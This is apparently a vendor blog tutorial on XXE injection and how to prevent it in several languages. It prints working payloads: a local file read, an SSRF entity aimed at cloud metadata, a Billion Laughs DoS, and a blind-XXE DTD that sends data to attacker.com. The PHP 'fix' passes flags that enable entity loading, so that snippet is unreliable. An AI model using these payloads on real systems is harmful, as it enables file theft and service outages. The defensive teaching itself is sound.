XML External Entity injection is a vulnerability class that exploits features of the XML specification itself. The XML standard supports entities — essentially variables that can reference external resources. When an XML parser processes a document containing external entity definitions, it can be tricked into reading local files, making network requests, or causing denial of service.
XXE is particularly frustrating because the vulnerable behavior is a feature, not a bug. XML parsers implement the specification correctly when they resolve external entities. The problem is that this feature is almost never needed by applications, yet it is enabled by default in many parsers.
How XXE Works
A standard XML document with an external entity:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
<name>&xxe;</name>
</userInfo>
When the parser processes &xxe;, it resolves the entity by reading /etc/passwd and inserting its contents where the entity reference appears. If the application returns the parsed XML content to the user, the attacker sees the file contents.
File reading is the most common XXE exploit. On Linux, /etc/passwd, /etc/shadow (if permissions allow), configuration files, and application source code are common targets. On Windows, C:\Windows\win.ini and C:\boot.ini are traditional targets.
SSRF through XXE. External entities can reference HTTP URLs:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
This makes the server fetch internal resources, identical in impact to SSRF.
Denial of service (Billion Laughs). Entity definitions can reference other entities recursively:
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- ... more levels ... -->
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<data>&lol9;</data>
Each level expands tenfold. Nine levels produce a billion copies of "lol", consuming gigabytes of memory and crashing the parser.
Blind XXE
When the application does not return XML content in responses, attackers use out-of-band techniques.
Parameter entities can load external DTDs:
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
The external DTD on the attacker's server can define entities that exfiltrate data through DNS or HTTP requests:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;
This technique sends the contents of /etc/hostname to the attacker's server as a URL parameter. It is limited by URL length restrictions and characters that are invalid in URLs, but it works for many sensitive files.
Prevention: Disable External Entities
The fix is straightforward: disable external entity processing and DTD processing in your XML parser. The specific configuration varies by language.
Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
Java (SAXParserFactory):
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Python (lxml):
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(source, parser)
Python (defusedxml — recommended):
import defusedxml.ElementTree as ET
tree = ET.parse(source)
The defusedxml library is a drop-in replacement that disables all dangerous XML features by default.
.NET:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);
PHP:
libxml_disable_entity_loader(true);
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
Note: libxml_disable_entity_loader is deprecated in PHP 8.0+ because entity loading is disabled by default.
Node.js (libxmljs):
const libxmljs = require('libxmljs');
const doc = libxmljs.parseXml(xml, { noent: false, dtdload: false });
Where XXE Hides
XXE is not limited to obvious XML parsing endpoints. It appears in unexpected places:
File uploads. DOCX, XLSX, PPTX, SVG, and many other file formats are XML-based. Uploading a crafted DOCX with an XXE payload can trigger the vulnerability when the server parses the file.
SOAP services. SOAP uses XML for request and response bodies. SOAP endpoints are prime XXE targets.
SAML. Security Assertion Markup Language uses XML. SAML authentication flows parse XML assertions, and XXE in SAML can bypass authentication entirely.
RSS/Atom feeds. Applications that consume XML feeds from external sources are vulnerable if the parser processes external entities.
Configuration files. Applications that parse XML configuration files from partially trusted sources (user-uploaded configs, partner-provided settings) are at risk.
PDF generation. Some PDF generators accept XML or HTML input. If the HTML parser resolves entities, XXE is possible.
Moving Away from XML
The most permanent fix for XXE is to stop using XML where alternatives exist. JSON does not support entities and cannot be vulnerable to XXE. Protocol Buffers, MessagePack, and other binary formats are similarly immune.
For new APIs, there is rarely a good reason to choose XML over JSON. For legacy APIs and file formats that require XML, disabling external entities is the practical solution.
Testing for XXE
Manual testing. Submit XML payloads with external entity definitions to any endpoint that accepts XML. Include payloads for file reading, SSRF, and denial of service. For blind XXE, use an out-of-band server to detect callbacks.
Automated testing. DAST tools include XXE test cases. SAST tools can identify XML parsing calls that do not disable external entities.
File upload testing. Create DOCX and XLSX files with XXE payloads in their internal XML files ([Content_Types].xml, xl/sharedStrings.xml) and upload them to the application.
How Safeguard.sh Helps
Safeguard.sh tracks every XML parsing library in your application's dependency tree. When a library is found to have an XXE-related vulnerability — or when a library defaults to unsafe XML parsing — Safeguard.sh flags it in your component inventory. The platform's continuous monitoring ensures that newly discovered XXE vulnerabilities in XML libraries are surfaced immediately, and policy gates can enforce that only properly configured, safe-by-default XML parsing libraries are used in production deployments.